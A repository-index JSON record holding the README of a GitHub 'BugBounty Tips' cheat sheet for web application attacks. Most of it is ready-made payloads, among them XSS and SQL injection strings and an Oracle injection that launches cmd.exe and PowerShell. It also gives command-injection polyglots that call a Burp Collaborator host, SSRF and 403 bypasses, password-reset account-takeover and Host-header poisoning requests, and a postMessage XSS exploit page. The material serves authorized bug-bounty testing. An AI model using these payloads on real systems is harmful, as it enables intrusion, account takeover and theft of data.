{"id":13841972,"url":"https://github.com/punishell/bbtips","last_synced_at":"2025-07-11T13:33:28.787Z","repository":{"id":41521352,"uuid":"243748572","full_name":"punishell/bbtips","owner":"punishell","description":"BugBountyTips","archived":false,"fork":false,"pushed_at":"2024-06-05T18:01:02.000Z","size":4313,"stargazers_count":397,"open_issues_count":1,"forks_count":83,"subscribers_count":17,"default_branch":"master","last_synced_at":"2024-08-05T17:30:14.793Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/punishell.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-02-28T11:37:40.000Z","updated_at":"2024-07-24T10:28:16.000Z","dependencies_parsed_at":"2023-01-29T02:15:56.766Z","dependency_job_id":"e12c6c43-713c-4fb6-9b8d-19684e2c4fc0","html_url":"https://github.com/punishell/bbtips","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/punishell%2Fbbtips","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/punishell%2Fbbtips/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/punishell%2Fbbtips/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/punishell%2Fbbtips/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/punishell","download_url":"https://codeload.github.com/punishell/bbtips/tar.gz/refs/heads/master","host":{"n
ame":"GitHub","url":"https://github.com","kind":"github","repositories_count":225729793,"owners_count":17515167,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:25.125Z","updated_at":"2024-11-21T12:30:43.998Z","avatar_url":"https://github.com/punishell.png","language":"JavaScript","readme":"# BugBounty Tips\t\nCollection of `#bugbountytips` from twitter and my bash-jutsu.\n# Recon\n```\nGoogle the company copyright footer to get more domains.\nUse whoxy.com to perform reverse whois lookups with the email used to register the main domain/\nSearch for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints.\nUse OpenSSL to get certificates. 
They can contain valuable info and common names for finding more subdomains.\nTry to recreate data from deleted accounts by signing up with the old email address.\nCheck text version of HTML e-mail for template injections\nWhen testing Rails Application add .json to url endpoints.\ncat file | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\"\ncurl http://host.xx/file.js | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\"\ngrep -EHirn \"accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into|DB_USER|DB_PASSWORD\" folder/\n```\n\n# Subdomain Enumeration\n```\nsublist3r -d $1 -o $1.txt\nmkdir thirdlevel\necho \"Gathering full third-level domain with sublister\"\nfor domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u \u003e\u003e final.txt; done \necho \"Probing for alive third-levels...\"\ncat final.txt | httprobe \u003e probed.txt\n```\n\n# subdomain level extraction\n|Regex pattern\t|Domain level match|\n| ------ | ------ |\n|grep -P '^(?:[a-z0-9]+\\.){1}[^.]*$'\t|2nd level domains only|\n|grep -P '^(?:[a-z0-9]+\\.){2}[^.]*$'\t|3rd level domains only|\n|grep -P '^(?:[a-z0-9]+\\.){2,}[^.]*$'\t|3rd level domains or higher|\n|grep -P '^(?:[a-z0-9]+\\.){2,3}[^.]*$'\t|3rd to 4th level domains only|\n|grep -P '^(?:[a-z0-9]+\\.){3,}[^.]*$'\t|4th level domains or higher|\n\n# Check live \n```\ncat GREPABLENMAP.gnmap | grep 443/open | cut -d \"(\" -f 1 | cut -d : -f 2| tr -d \" \" | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\\*\\.?##' | sed -E 's#,#\\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\\/\\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew \n```\n# Check live webapps from sublist3r\n```\ncat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\\*\\.?##' | sed -E 's#,#\\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 
's/^/https:\\/\\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew \n```\n# Filter ffuf output\n```\ncat * | jq | grep \"url\\\"\" | grep -v \"replayproxyurl\" |grep -v \"proxyurl\"  | grep -v \"FUZZ\" | cut -d \\\" -f4\n```\n\n# Extract juicy data from js  \n```\ngo install -v github.com/punishell/gofinder@v0.1.1\necho example.com | assetfinder | httprobe| subjs | gofinder\n\n```\n\n# Tools\n```\nUse exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators\nUse cloud_enum to find open google buckets or azure accounts \nUse Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\\.-]{2,}/[{}/a-z0-9A-Z_\\.-]+'\nUse WayBackmachine combined with paraminer or parameth\nPassive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\nBurp Collaborator alternative https://app.interactsh.com/#/\n```\n\n# Payloads\n```\nInject payloads in parameter names, ?\u003cscript\u003ealerty\u003c/script\u003e=true\nUse youtube(olx, etc...) videos with xss in names.\nUse round brackets to inject payload into valid e-mail address.\nX-Forwarded-For: ${payload}\nUse longstring parameters for stacktrace.\nWAFBYPASS ?page=\";confirm`1`//   Rightwards -\u003e 302; ?pag%65=\";confirm`1`//   Rightwards -\u003e 200 + XSS!\nRedirect bypass %26next=http://example.com \nWhen testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path\nAdd [] to name of parrameter: pwd= -\u003epwd[]=\nwhen interacting with db try to put % in parameter  ?item=%\n```\n\n# Authentication \u0026 Autorization \n```\nUUID Idor Trick, Register user with the same name, it maybe return uuid.\nTry to bruteforce login endpoint. 
/login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo\n403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200, \nBypass paywalls by using Google Bot user agent.\nUse securitytrails.com to find the originating server IP\nDo match and replace from false to true.\nSet your birthday for today or tomorrow to get discounts.\nSkip steps: /step/shipping -\u003e  ~~/step/payment~~ -\u003e /step/confirm\nCheck whether Black Friday coupon codes expire.\nUse blind xss as password.\nLogin to site using Facebook and try to change userid during POST requests\n/api/v1/users/profile?id=MYID\u0026id=ANOTHERUSERID -\u003e HTTP 200 \n```\n# Email Restriction bypass\n```\ninti(;inti@inti.io;)@whitelisted.com\n\n→ inti(;\n→ inti@inti.io → my inbox!\n→ ;)@whitelisted.com\n● inti@inti.io(@whitelisted.com)\n● inti+(@whitelisted.com;)@inti.io\n```\n\n# Email Address input fuzz\n```\ntest+(\u003cscript\u003ealert(1)\u003c/script\u003e)@example.com\ntest@example(\u003cscript\u003ealert(1)\u003c/script\u003e).com\n\"\u003cscript\u003ealert(1)\u003c/script\u003e\"@example.com\n\n\"\u003c%=7*7%\u003e\"@example.com\ntest+(${{7*7}})@example.com\n\n\"'OR 1=1--\"@example.com\n\"mail');DROP TABLE users;--\"@example.com\n\ntest@example.burpcollaborator.net\ntest@[127.0.0.1]\n\nvictim\u0026email=attacker@example.com\n\n\"%0d%0aContent-Lenght:%200@0d%0a%0d%0a\"@example.com\"recipient@test.com\u003e\\r\\nRCPT TO:\u003cvictim+\"@test.com\n```\n# Account takeover via Email \n```\nGET /passwordreset\n\nDouble parameter (aka. 
HPP / HTTP parameter pollution):\nemail=victim@xyz.tld\u0026email=hacker@xyz.tld\nCarbon copy:\nemail=victim@xyz.tld%0a%0dcc:hacker@xyz.tld\nUsing separators:\nemail=victim@xyz.tld,hacker@xyz.tld\nemail=victim@xyz.tld%20hacker@xyz.tld\nemail=victim@xyz.tld|hacker@xyz.tld\nNo domain:\nemail=victim\nNo TLD (Top Level Domain):\nemail=victim@xyz\nJSON table:\n{\"email\":[\"victim@xyz.tld\",\"hacker@xyz.tld\"]}\n```\n# Password Reset:\n```\nreset userpassword: user@email.com.burpcolaborator.com\n```\n# Find GET parameters in example.com\n```\nassetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo \"var [a-zA-Z0-9]+\" | sed -e 's,'var','\"$url\"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/\u0026=xss/g'); echo -e \"\\e[1;33m$url\\n\\e[1;32m$vars\"; done\n```\n\n# Command injection polyglot\n```\n/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'\"||ping -c 2 example.com||\"/*`*/\n/*$(echo 1 \u003e/tmp/rce1)`echo 1 \u003e/tmp/rce1``*/-echo 1 \u003e/tmp/rce1-'/*$(echo 1 \u003e/tmp/rce1)`echo 1 \u003e/tmp/rce1` #*/-echo 1 \u003e/tmp/rce1||'\"||echo 1 \u003e/tmp/rce1||\"/*`*/\n|echo lol2137||a #' |echo lol2137||a #|\" |echo lol2137||a #\n||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1\n||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\\\" |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net\n||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\\\" |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net\n$(sleep 21)\n```\n# SSRF Bypass list for localhost 
(127.0.0.1):\n```\nhttp://127.1/\nhttp://0000::1:80/\nhttp://[::]:80/\nhttp://2130706433/\nhttp://whitelisted@127.0.0.1\nhttp://0x7f000001/\nhttp://017700000001\nhttp://0177.00.00.01\n```\n\n# Top 25 SSRF parameters\n```\n?dest={target}\n?redirect={target}\n?uri={target}\n?path={target}\n?continue={target}\n?url={target}\n?window={target}\n?next={target}\n?data={target}\n?reference={target}\n?site={target}\n?html={target}\n?val={target}\n?validate={target}\n?domain={target}\n?callback={target}\n?return={target}\n?page={target}\n?feed={target}\n?host={target}\n?port={target}\n?to={target}\n?out={target}\n?view={target}\n?dir={target}\n```\n# Top 25 RCE parameters\n```\n?cmd={payload}\n?exec={payload}\n?command={payload}\n?execute={payload}\n?ping={payload}\n?query={payload}\n?jump={payload}\n?code={payload}\n?reg={payload}\n?do={payload}\n?func={payload}\n?arg={payload}\n?option={payload}\n?load={payload}\n?process={payload}\n?step={payload}\n?read={payload}\n?function={payload}\n?req={payload}\n?feature={payload}\n?exe={payload}\n?module={payload}\n?payload={payload}\n?run={payload}\n?print={payload}\n```\n# Top 25 LFI parameters\n```\n?cat={payload}\n?dir={payload}\n?action={payload}\n?board={payload}\n?date={payload}\n?detail={payload}\n?file={payload}\n?download={payload}\n?path={payload}\n?folder={payload}\n?prefix={payload}\n?include={payload}\n?page={payload}\n?inc={payload}\n?locate={payload}\n?show={payload}\n?doc={payload}\n?site={payload}\n?type={payload}\n?view={payload}\n?content={payload}\n?document={payload}\n?layout={payload}\n?mod={payload}\n?conf={payload}\n```\n\n# HackerOne redirect 
parameters\n```\n/[redirect]\n?targetOrigin=[redirect]\n?fallback=[redirect]\n?query=[redirect]\n?redirection_url=[redirect]\n?next=[redirect]\n?ref_url=[redirect]\n?state=[redirect]\n?l=[redirect]\n?redirect_uri=[redirect]\n?forum_reg=[redirect]\n?return_to=[redirect]\n?redirect_url=[redirect]\n?return_url=[redirect]\n?host=[redirect]\n?url=[redirect]\n?redirectto=[redirect]\n?return=[redirect]\n?prejoin_data=[redirect]\n?callback_url=[redirect]\n?path=[redirect]\n?authorize_callback=[redirect]\n?email=[redirect]\n?origin=[redirect]\n?continue=[redirect]\n?domain_name=[redirect]\n?redir=[redirect]\n?wp_http_referer=[redirect]\n?endpoint=[redirect]\n?shop=[redirect]\n?qpt_question_url=[redirect]\n?checkout_url=[redirect]\n?redirect_to=[redirect]\n?succUrl=[redirect]\n?file=[redirect]\n?link=[redirect]\n?referrer=[redirect]\n?recipient=[redirect]\n?redirect=[redirect]\n?u=[redirect]\n?hostname=[redirect]\n?returnTo=[redirect]\n?return_path=[redirect]\n?image=[redirect]\n?requestTokenAndRedirect=[redirect]\n?retURL=[redirect]\n?next_url=[redirect]\n```\n\n# MORE PARAMETERS\nhttps://github.com/1ndianl33t/Gf-Patterns\n\n# Massive XSS\n```\n#!/bin/bash\n# $1 =\u003e example.domain\n\nsubfinder -d $1 -o domains_subfinder_$1\namass enum --passive -d $1 -o domains_$1\n\ncat domains_subfinder_$1 | tee -a domains_$1\ncat domains_$1 | filter-resolved | tee -a domains_$1.txt\n\ncat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt\n```\n# Massive Top Parameters search\n```\nTBA \necho \"http://tesla.com\" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew\n```\n# Juicy GoogleDorks\n```\nsite:example.com inurl:.cgi?\n```\n# File Upload and what to search\n```\nASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE\nSVG: Stored XSS / SSRF / XXE\nGIF: Stored XSS / SSRF\nCSV: CSV injection\nXML: XXE\nAVI: LFI / SSRF\nHTML / JS : HTML injection / XSS / Open redirect\nPNG / JPEG: Pixel 
flood attack (DoS)\nZIP: RCE via LFI / DoS\nPDF / PPTX: SSRF / BLIND XXE\n```\n# File upload chain\n```\n../../../tmp/lol.png —\u003e for path traversal\nsleep(10)-- -.jpg —\u003e for SQL injection\n\u003csvg onload=alert(document.domain)\u003e.jpg/png —\u003e for XSS\n; sleep 10; —\u003e for command injections\n```\n# Find JavaScript Files in Target.com\n```\necho target.com | gau | grep '\\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'\nor\ncat domains | httpx -silent | subjs | anew\n```\n# Extract endpoints from \\*.js \n```\ncat file.js | grep -aoP \"(?\u003c=(\\\"|\\'|\\`))\\/[a-zA-Z0-9_?\u0026=\\/\\-\\#\\.]*(?=(\\\"|\\'|\\`))\" | sort -u\n```\n\n# 403 bypass\n```\nhttps://target.com/admin/ –\u003e HTTP 302 (redirect to login page)\nhttps://target.com/admin..;/ –\u003e HTTP 200 OK\n\nhttps://target.com/../admin\nhttps://target.com/whatever/..;/admin\n\nsite.com/secret –\u003e HTTP 403 Forbidden\nsite.com/secret/ –\u003e HTTP 200 OK\nsite.com/secret/. –\u003e HTTP 200 OK\nsite.com//secret// –\u003e HTTP 200 OK\nsite.com/./secret/.. 
–\u003e HTTP 200 OK\n\nX-Original-URL: /admin\nX-Override-URL: /admin\nX-Rewrite-URL: /admin\n\n/accessible/..;/admin\n/.;/admin\n/admin;/\n/admin/~\n/./admin/./\n/admin?param\n/%2e/admin\n/admin#\n\n```\n# Data leakage through .json\n```\nHere’s a tip to achieve sensitive data leak using .json extension.\n\nRequest:\nGET /ResetPassword HTTP/1.1\n{\"email\":\"victim@example.com\"}\n\nResponse:\nHTTP/1.1 200 OK\nNow let’s try this instead:\n\nRequest:\nGET /ResetPassword.json HTTP/1.1\n{\"email\":\"victim@example.com\"}\n\nResponse:\nHTTP/1.1 200 OK\n{\"success\":\"true\",\"token\":\"596a96-cc7bf-9108c-d896f-33c44a-edc8a\"}\n```\n# Generate wordlist for target\n```\necho \"bugcrowd.com\" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:\u0026#]/\\\\n/g' | anew\n```\n\n# Check for SQLi\n```\n/?q=1\n/?q=1'\n/?q=1\"\n/?q=[1]\n/?q[]=1\n/?q=1`\n/?q=1\\\n/?q=1/*'*/\n/?q=1/*!1111'*/\n/?q=1'||'asd'||'  \u003c== concat string\n/?q=1' or '1'='1\n/?q=1 or 1=1\n/?q='or''='\n```\n# SQLi in Email parameter\n\n| Payload | Response |Injection Status |\n| ------ | ------ |------ |\n|{“email”:”asd@a.com”}| {“code”:2002,”status”:200,”message”:”Email not found.”}|\tValid|\n|{“email”:”asd a@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”\\”asd a\\”@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”asd(a)@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”\\”asd(a)\\”@a.com”}|\t{“code”:2002,”status”:200,”message”:”Email not found.”}|\tValid|\t\n|{“email”:”asd’a@a.com”}|\t{“code”:0,”status”:500,”message”:”Unspecified error”}|\tNot Valid|\t\n|{“email”:”asd’or’1’=’1@a.com”}|\t{“code”:2002,”status”:200,”message”:”Email not found.”}\tValid|\t\n|{“email”:”a’-IF(LENGTH(database())\u003e9,SLEEP(7),0)or’1’=’1@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot 
Valid|\n|{“email”:”\\”a’-IF(LENGTH(database())\u003e9,SLEEP(7),0)or’1’=’1\\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tDelay: 7,854 milis|\n|{“email”:”\\”a’-IF(LENGTH(database())=10,SLEEP(7),0)or’1’=’1\\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tDelay: 8,696 milis|\n|{“email”:”\\”a’-IF(LENGTH(database())=11,SLEEP(7),0)or’1’=’1\\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tNo delay|\n\n### Oracle\n```\n1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) \u003e71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual --\n1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\\\WINDOWS\\\\system32\\\\cmd.exe /c type C:\\\\users\\\\public\\\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=\u003e''myjob11'',program_name=\u003e''exec4'',start_date=\u003eNULL,repeat_interval=\u003eNULL,end_date=\u003eNULL,enabled=\u003eTRUE,auto_drop=\u003eTRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=\u003e''exec4'');dbms_scheduler.purge_log;'), null  FROM DUAL --\n1' AND 1=1 UNION SELECT null, user FROM DUAL --\n```\n\n\n### Cool BurpPlugins\n```\nAutorize – To test BACs (Broken Access Control)\nBurp Bounty – Profile-based scanner\nActive Scan++ – Add more power to Burp’s Active Scanner\nAuthMatrix – Authorization/PrivEsc checks\nBroken Link Hijacking – For BLH (Broken Link Hijacking)\nCollaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery)\nCommand Injection Attacker\nContent-Type Converter – Trying to bypass certain restrictions by changing Content-Type\nDecoder Improved – More decoder features\nFreddy – Deserialization\nFlow – Better HTTP history\nHackvertor – Handy type conversion\nHTTP Request Smuggler\nHunt – Potential vuln identifier\nInQL – GraphQL Introspection testing\nJ2EE Scan – Scanning J2EE apps\nJSON/JS 
Beautifier\nJSON Web Token Attacker\nParamMiner – Mine hidden parameters\nReflected File Download Checker\nReflected Parameter – Potential reflection\nSAML Raider – SAML testing\nUpload Scanner – File upload tester\nWeb Cache Deception Scanner\n```\n# Detect framework via favicon\n```\ncat urls.txt | python3 favfreak.py -o output\n```\n\n### Password Poisoning\n```\n(1) Normal request:\n\nRequest:\nPOST /password-reset?user=123 HTTP/1.1\nHost: target.com\nLink received:\nhttps://target.com/reset-link=1g2f3guy23g\n(2) Basic HHI (Host Header Injection):\n\nRequest:\nPOST /password-reset?user=123 HTTP/1.1\nHost: evil.com\nLink received:\nnone\nError 404 - request blocked\n(3) Bypass technique:\n\nRequest:\nPOST https://target.com/password-reset?user=123 HTTP/1.1\nHost: evil.com\nLink received:\nhttps://evil.com/reset-link=1g2f3guy23g\n```\n### Find hostnames from a given IP\n\n```\necho 192.168.69.69 | cero\n```\n\n### XSS Post Message POC\n```\nVulnerable PostMessage\n\u003cscript src=\"//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js\"\u003e\u003c/script\u003e\n\u003cscript\u003e\nwindow.addEventListener(\"message\", (event) =\u003e {\nconsole.log(event.data);\n$(event.data)\n}, false);\n\u003c/script\u003e\n\n\nExploit \n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n    \u003chead\u003e\n    \u003c/head\u003e\n\u003cbody\u003e\n\u003cscript\u003e\nvar myWindow = window.open(\"http://example.com/test.html\")\n\u003c/script\u003e\n\u003cscript\u003e\nsetInterval(function(){myWindow.postMessage(\"\u003cimg src=x onerror=alert(123);\u003e\",\"*\");},3000);\nwindow.onmessage = function (e) {\nconsole.log(e);\n};\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n### Deserialization 
\n```\nhttps://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/\nhttps://github.com/tyranid/ExploitRemotingService\nhttps://github.com/nccgroup/VulnerableDotNetHTTPRemoting\nhttps://github.com/pwntester/ysoserial.net/blob/master/README.md\nhttps://nickbloor.co.uk/2018/02/28/popping-wordpress/\n```\n### From Path Traversal to Source Code in Asp.NET MVC Applications\n```\nhttps://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html\nhttps://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/\nhttp://bit.ly/2NDZc73\n```\n### Hacking IIS\n```\nhttps://www.youtube.com/watch?v=HrJW6Y9kHC4\n```\n\n\n### Getting endpoints from web-archive\n```\ncat hosts.live | gau -b ttf,woff,svg,png,jpg,gif,css,jpeg,pdf,zip,gz | tee -a hosts.gau\n```\n\n### CLI Hacking Cheatsheet\nGetting JS from live hosts\n```\ncat hosts.httprobe | getJS --complete | tee -a hosts.httprobe.js\ncat hosts.httprobe | gau | tee -a hosts.httprobe.gau\ncat hosts.httprobe.gau |grep -iE '\\.js'|grep -ivE '\\.json'|sort -u \u003e\u003e hosts.httprobe.js # cat hosts.httprobe.gau | unfurl format %s://%d%p |grep -iE '\\.js'|grep -ivE '\\.json'|sort -u\ncat hosts.httprobe.js | sort -u \u003e\u003e hosts.httprobe.js.sorted\ncat hosts.httprobe.js.sorted|cut -d \\? 
-f1 | sort -u | httpx -mc 200 | tee -a hosts.httprobe.js.sorted.200\ncat hosts.httprobe.js.sorted.200 |  httpx -silent -sr -mc 200 \n```\nSearching for RXSS\n```\ncat hosts.httprobe | gau | tee -a hosts.httprobe.gau\ncat hosts.httprobe.gau | unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl \ncat hosts.httprobe.gau.unfurl  | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.200\ncat hosts.httprobe.gau.unfurl.200 | dalfox pipe -o hosts.httprobe | tee -a hosts.httprobe.gau.unfurl.200.dalfox\n```\nGeting endpoints with potential hackable parameters\n```\ncat hosts.httprobe | cut -d / -f 3 |gau -b css,png,jpeg,jpg,svg,gif,wolf,pdf,txt,ptt,gz,zip,csv | tee -a  hosts.httprobe.gau \ncat hosts.httprobe.gau | grep -E 'asp|aspx|cgi|jsp|php|sql'| unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl.ext\nfor i in `cat hosts.httprobe.gau.unfurl.ext`; do  grep $i hosts.httprobe.gau | grep \\? | head -n1  | tee -a hosts.httprobe.gau.unfurl.ext.filtred ; done\ncat hosts.httprobe.gau.unfurl.cgi.filtred | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.cgi.filtred.200\n```\nBruteforcing juicy endpoints\n```\nfor i in `cat hosts.httprobe.filtred `; do ffuf -w /payloads/free-kill.txt -u $i/FUZZ -of json -o qh-output/`echo $i | cut -d / -f3` -mc 200 -fl 1 -ac ; done\nfor i in `ls qh-output/`; do cat qh-output/$i | python -m json.tool | grep \"url\\\"\" | grep -v \"replayproxyurl\" |grep -v \"proxyurl\"  | grep -v \"FUZZ\" | cut -d \\\" -f4 \u003e\u003e qh-urls.txt;done \n```\n\n### Random\n```\nhttps://regex-generator.olafneumann.org/\nhttps://regex101.com/\n```\n\n### Reference\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/\n\nhttps://soroush.secproject.com/blog/\n","funding_links":[],"categories":["Others 
(1002)","Others","JavaScript"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpunishell%2Fbbtips","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpunishell%2Fbbtips","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpunishell%2Fbbtips/lists"}